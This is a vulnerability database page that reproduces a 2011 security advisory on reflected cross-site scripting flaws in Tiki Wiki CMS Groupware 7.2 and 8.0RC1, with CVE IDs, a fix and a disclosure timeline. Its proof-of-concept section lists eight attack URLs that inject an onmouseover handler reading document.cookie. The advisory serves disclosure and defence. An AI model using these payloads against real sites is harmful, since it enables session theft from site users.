Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormStefan SchurtzPACKETSTORM:107082
HistoryNov 17, 2011 - 12:00 a.m.

Tiki Wiki CMS Groupware Cross Site Scripting

2011-11-1700:00:00
Stefan Schurtz
packetstormsecurity.com
33

0.001 Low

EPSS

Percentile

49.6%

JSON
`Advisory: Tiki Wiki CMS Groupware Multiple XSS vulnerabilities  
Advisory ID: INFOSERVE-ADV2011-01  
Author: Stefan Schurtz  
Contact: [email protected]  
Affected Software: Successfully tested on Tiki 7.2 & 8.0 RC1  
Vendor URL: http://info.tiki.org/  
Vendor Status: fixed for Tiki 7 (New Tiki 6 LTS release in progress)  
CVE-ID: CVE-2011-4454, CVE-2011-4455  
  
==========================  
Vulnerability Description  
==========================  
  
All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities  
  
==================  
PoC-Exploit  
==================  
  
8.0RC1  
  
http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"  
  
7.2  
  
http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)"  
  
=========  
Solution  
=========  
  
Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)  
  
====================  
Disclosure Timeline  
====================  
  
02-Nov-2011 - informed Security Team ([email protected])  
03-Nov-2011 - feedback from vendor  
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by the INFOSERVE Security Team  
  
===========  
References  
===========  
  
http://info.tiki.org/  
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1  
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x  
http://secunia.com/advisories/46740  
`

Related

openvas 1
securityvulns 2
prion 2
cve 2
openvas
openvas
Tiki Wiki CMS Groupware URL Multilple Cross-Site Scripting Vulnerabilities
2011-12-06 00:00:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2011-11-21 00:00:00
Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
2011-11-21 00:00:00
prion
prion
Cross site scripting
2019-11-20 19:15:00
Cross site scripting
2019-11-20 19:15:00
cve
cve
CVE-2011-4455
2019-11-20 19:15:00
CVE-2011-4454
2019-11-20 19:15:00

0.001 Low

EPSS

Percentile

49.6%

JSON
Related for PACKETSTORM:107082
openvas1securityvulns2prion2cve2